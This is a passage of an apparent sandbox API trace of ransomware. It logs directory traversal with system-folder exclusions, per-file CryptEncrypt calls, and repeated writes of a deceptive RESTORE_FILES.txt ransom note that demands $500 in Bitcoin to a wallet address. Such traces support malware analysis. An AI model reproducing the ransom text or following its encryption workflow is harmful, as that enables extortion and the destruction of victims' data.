$500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.735] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.736] lstrlenA (lpString="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") returned 684 [0044.736] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.736] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.736] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.736] CloseHandle (hObject=0xac) returned 1 [0044.736] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.736] lstrcmpiW (lpString1="zh-HK", lpString2="Windows") returned 1 [0044.736] lstrcmpiW (lpString1="zh-HK", lpString2="Program Files") returned 1 [0044.736] lstrcmpiW (lpString1="zh-HK", lpString2="Program Files (x86)") returned 1 [0044.736] lstrcmpiW (lpString1="zh-HK", lpString2="$Recycle.bin") returned 1 [0044.737] lstrcmpiW (lpString1="zh-HK", lpString2="System Volume Information") returned 1 [0044.737] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0044.737] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0044.737] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0044.737] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0044.737] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.737] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.737] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.737] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.737] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.737] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.737] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0044.737] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.737] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.737] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.737] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.737] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.737] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.737] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.737] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0044.737] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.737] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.737] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.737] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0044.737] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.737] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.737] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.737] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.738] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.738] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.738] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.738] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\RESTORE_FILES.txt") returned 35 [0044.738] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\RESTORE_FILES.txt" (normalized: "c:\\boot\\zh-hk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.738] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.738] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.739] lstrlenA (lpString="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") returned 684 [0044.739] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.739] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.739] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.739] CloseHandle (hObject=0xac) returned 1 [0044.739] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="Program Files") returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="Program Files (x86)") returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="$Recycle.bin") returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="System Volume Information") returned 1 [0044.739] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0044.739] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0044.739] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0044.739] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0044.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.739] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.739] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.739] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.739] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.739] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.739] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0044.739] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.739] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.740] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.740] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.740] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.740] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.740] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.740] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0044.740] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.740] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.740] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.740] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0044.740] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.740] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.740] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.740] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.740] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.740] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.740] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.740] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\RESTORE_FILES.txt") returned 35 [0044.740] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\RESTORE_FILES.txt" (normalized: "c:\\boot\\zh-tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.740] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.740] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.741] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.741] WriteFile (in: hFile=0xac, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.741] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.741] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.741] CloseHandle (hObject=0xac) returned 1 [0044.741] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0044.741] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0044.741] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\RESTORE_FILES.txt") returned 29 [0044.741] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\RESTORE_FILES.txt" (normalized: "c:\\boot\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0044.742] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.742] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0044.742] lstrlenA (lpString="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") returned 684 [0044.742] WriteFile (in: hFile=0xa0, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0044.743] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.743] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.743] CloseHandle (hObject=0xa0) returned 1 [0044.743] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="Windows") returned -1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="Program Files") returned -1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="Program Files (x86)") returned -1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="$Recycle.bin") returned 1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="System Volume Information") returned -1 [0044.743] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0044.743] StrStrIW (lpFirst="bootmgr", lpSrch=".protected") returned 0x0 [0044.743] lstrcmpW (lpString1="bootmgr", lpString2="RESTORE_FILES.txt") returned -1 [0044.743] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f87c | out: pbBuffer=0x295f87c) returned 1 [0044.743] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x30) returned 1 [0044.744] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.744] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Windows") returned -1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Program Files") returned -1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Program Files (x86)") returned -1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="$Recycle.bin") returned 1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="System 
Volume Information") returned -1 [0044.744] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0044.744] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".protected") returned 0x0 [0044.744] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="RESTORE_FILES.txt") returned -1 [0044.744] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f87c | out: pbBuffer=0x295f87c) returned 1 [0044.744] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x30) returned 1 [0044.744] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.745] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="Windows") returned -1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="Program Files") returned -1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="Program Files (x86)") returned -1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="$Recycle.bin") returned 1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="System Volume Information") returned -1 [0044.745] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0044.745] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0044.745] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0044.746] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0044.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 
0x447b60 [0044.746] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.746] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.746] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.746] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.746] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.746] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0044.746] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.746] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0044.746] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0044.746] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.746] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.746] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\." 
(normalized: "c:\\config.msi\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.746] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.746] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.746] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.746] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.746] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.746] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.746] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0044.746] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.746] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.746] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0044.746] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0044.746] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.747] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.747] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\.." 
(normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.747] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0044.747] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0044.747] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\RESTORE_FILES.txt") returned 35 [0044.747] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\RESTORE_FILES.txt" (normalized: "c:\\config.msi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0044.747] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files 